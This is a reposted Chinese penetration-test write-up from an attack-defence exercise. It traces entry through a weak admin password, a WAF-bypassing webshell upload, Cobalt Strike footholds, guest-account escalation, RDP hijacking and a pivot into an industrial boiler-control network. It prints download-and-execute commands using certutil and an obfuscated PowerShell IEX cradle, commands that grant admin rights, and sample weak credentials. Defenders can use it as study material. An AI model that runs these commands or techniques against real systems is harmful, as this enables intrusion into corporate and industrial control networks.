Redian新闻
>
从弱口令到内网生产区

从弱口令到内网生产区

科技
前段时间参加了一次攻防演练,其中遇到了不少有意思的问题,最后也是进到了内网生产区,大体把过程写一下。

前期信息收集

首先给定的目标是包括公司官网之类的互联网资产,刚开始做信息收集的时候在各种互联 网资产探测引擎上查找目标信息,尝试了各种SQL注入以及反序列化等可以简单getshell的方 式,然而并没有什么用。另外资产探测引擎一般会在每天的0点更新一次前一天发现的资 产,所以0点过后对白天搜索过的目标再检索一次可能会有意想不到的收获。对web资产直接访问会经常访问不到具体的系统,而是一些默认的中间件配置页面,有些目 标可能因为有防护设备的原因,拿爆破目录的工具一扫就被封IP,这很头疼。。。

某平台弱口令

在探测引擎资产测试无果后,决定试一下用Nmap扫全端口,因为正常情况下fofa等工具很 难对某个IP做到百分之百的资产探测而且存在一定的延时性。在扫描某个IP的全端口之 后,找到了一个之前没有发现的系统,而且存在弱口令。
admin 123456

通过脏字符绕waf,文件上传获取webshell

进入系统后,翻了一遍各功能发现虽然是超级管理员权限,但是系统中并没有包含员工的 敏感信息(众所周知,身份证号等的敏感信息泄露可以用来刷分)或者是其他的有用数 据,所以尝试一下对其中的搜索、上传等功能进行利用看能不能getshell。
系统的安全检验禁用了直接上传jsp的方式,且大部分常见的上传绕过方式都是不可用的
根据返回结果判断存在waf,拦截了文件名和内容
尝试了几处的文件上传都无法成功,要么就是可以上传,但并不返回地址也不解析,白给了属于是
最后在一个“通知发放”的功能中找到了一处可用的文件上传漏洞,不过其中也是费尽一 些周折。
经过多次尝试后发现,在POST数据包中给文件名添加超长的脏字符数据可以绕过文件名的 安全检验,另外配合免杀的jsp马直接获取一个administrator权限的webshell(当然这种方式也 比较常见而且有失败的可能,但是每种方法多试几次,成功的概率总会比较大一些)。Burp上传的数据包过长导致无法截全图,但是基本思路是如下这样(图片来自互联网,侵 删),即在filename后的文件名字段添加不停地添加数据,这样WAF可能为因为性能原因作 出让步,超出检查长度的内容,将不会被检查。
成功获取webshell
探测一下受害主机相关信息,发现目标主机出网,但是存在杀软

powershell绕过杀软.上线cs

既然现在我们有了一个webshell,那么接下来的利用思路可以选择证书下载或者powershell等 方式上线cs。
可以尝试使用证书下载尝试下载木马到服务器执行:
 certutil.exe -urlcache -split -f http://x.x.x.x/x.exe D:\x.exe
很明显,在安全设备的拦截下,这种基础的证书下载也是白给
尝试执行powershell命令直接上线cs
powershell.exe IEX ((new-object                     net.webclient).downloadstring('http://x.x.x.x/x'))
先拿powershell试试,利用其实现与远端IP进行通信,利用其传递木马执行实现肉鸡上线。其最主要优点就是无文件落地,痕迹只存在于内存进程之中,隐蔽性较强。不过正常来说 这种通过公网IP地址下载并执行木马脚本,肯定会被杀毒软件WAF等设备拦截,我们可以 通过对PowerShell语句进行改进、变换、拼接等操作,实现免杀。
echo I^E^X ((new-object net.webclient).d^o^w^n^l^o^a^d^s^t^r^i^n^g('http://0.0.0.0)) | p^o^w^e^r^s^h^e^l^l -

读密码,搭建socks代理,进入内网

主机上线CS后对本机进行信息收集,发现目标为server2012服务器,无法读取明文密码,因 此选择激活guest用户
激活guest用户
net user guest /active:yesnet user guest tide@123456net localgroup administrators guest /add
搭建socks5隧道登录guest用户,使用rdp劫持登录administrator。
query usersc create tide binpath= "cmd.exe /k tscon 1 /dest:rdp-tcp#4" #1为目标会 话id和当前会话名net start tide

探测内网资产

成功登录后通过在本机进行信息收集,发现远程连接的凭证信息,其它服务数据库密码等 等信息
继续对内网资产进行探测,发现一些MS17010以及数十台数据库弱口令、还有一些内网web 弱口令等较多资产,这里就不一一列举了
192.168.x.x mssql:sa/sa123
mssql:192.168.x.x:1433:sa sa123
在内网不断收集信息横向移动

突破到内网生产区专网

原本以为作为一个常规内网,刷几台数据库+内网web弱口令+几台SSH后就在此结束,但是 在内网资产收集过程中,通过数据库命令执行发现某台机器存在多网卡191和192段
该网段不通互联网且不通业务内网
通过查看进程,发现进程中存在MODBUS协议软件进程,猜测为工控主机。
因为无法连接191该段,尝试了多种方法,最终通过通过cs正向木马上线,以当前被控机作 为跳板机正向连接此191网段多网卡机器
首先生成监听器beacon-tcp,监听在17775端口
然后CS生成一个stageless木马,选定刚才的新建 监听器
最后运行生成的木马,并在 beacon中执行connect x.x.x.x 17775即可建立子beacon上线CS。
上线cs后,尝试搭建二层socks代理进入生产专网。获取主机密码后,登录rdp,发现本机存在锅炉监控系统(图文无关)
再对这台主机的内网资产进行探测,发现http://191.0.x.x user/123456 该设备为锅炉监控控制 器,处理并转发现场锅炉设备的数据(图文无关)
然后通过某工控机-4 Administrator 空密码(图文无关)
工控机1-Administrator 空密码(图文无关)
还有几台类似机器,就不把图放上了,总的成果来说是这些

总结

1、信息收集真的很重要,哪怕是一个小小的弱口令最后都可能造成严重的后果。
2、不要觉得扫全端口很麻烦,这招简直屡试不爽,我经常在某个目标C段中每10个IP为一 组去挨个扫全端口,总能有一些新收获。
3、免杀和绕过需要不断地积累学习,红队在进步,蓝队(设备)也在进步。

微信扫码关注该文公众号作者

戳这里提交新闻线索和高质量文章给我们。
相关阅读
中航无人机通过科创板注册:拟募资16.4亿 生产大型无人机上海车企复工:走出方舱的工人,已重回生产线苹果 WWDC 全总结:M2 芯片和 MacBook Air 一起来,iPadOS 生产力大升级内网--端口转发以及端口复用中国的现代化与中国学者对“现代化”的讨论7099元、6150元,i9-12900K生产力主机良种+农机+农艺!粮食生产走向智能化高品质反歧视的最佳方式是不提歧视,只提客观公正。【经济】性价比高,法国这个小众产区葡萄酒热销美国傍晚时分香街阳光下的树叶“我感受到内心的某些意识正在觉醒” | 读者笔记Android 平板距离生产力工具,还差三代 iPadOS记一次实战攻防(打点-Edr-内网-横向-Vcenter)飞利浦迈出关键一步:“生产创新双驱动”引领本土化全面进阶[电脑] 12700K + ROG 3090TI + XPG 1300W,准旗舰高功耗生产力主机秀珂睿科技获数千万A轮融资,生产高端液相色谱仪|36氪首发从实用到审美,“设计力”成为新型生产力汪海林:《电视剧网络剧摄制组生产规范(试行)》对演员片酬有什么具体影响?【微报告】中国HR SaaS行业研究报告:HR SaaS助力企业释放生产力丨甲子光年智库上海车企复工:封闭生产员工身兼数职,火锅KTV缓解心理压力后现代社会“去生产化”,正在消解我们共情的基础|自由谈从web端getshell到内网域控不要显卡?i9-12900K生产力主机「简报」SCS 校友将农业与自动化技术结合以简化食品生产;Sudoc 荣获快速发展公司的世界变革理念奖新歌生产步入「百万级时代」,热曲《踏雪》《海市蜃楼》们是怎么诞生的?应需而变,数字生产力落地大考进行时|甲子引力月球上能生产氧气和燃料了?月壤里藏着答案……“表演式工作”:远程时代的生产率杀手同意。“西式民主”由西式思维决定:根据财富的丰富程度,有一个从贵族向平民的普及过程。制度只是反映,不是决定因素。「网生艺人」汪小菲NPS内网穿透工具使用详解在美国76。一天打三份工核酸采样管生产日期是2022年6月7日!什么情况?记一奇葩弱口令到内网实战一诺&陈海贤今日直播:如何在动荡的关系中找到内心的安宁?
logo
联系我们隐私协议©2024 redian.news
Redian新闻
Redian.news刊载任何文章,不代表同意其说法或描述,仅为提供更多信息,也不构成任何建议。文章信息的合法性及真实性由其作者负责,与Redian.news及其运营公司无关。欢迎投稿,如发现稿件侵权,或作者不愿在本网发表文章,请版权拥有者通知本网处理。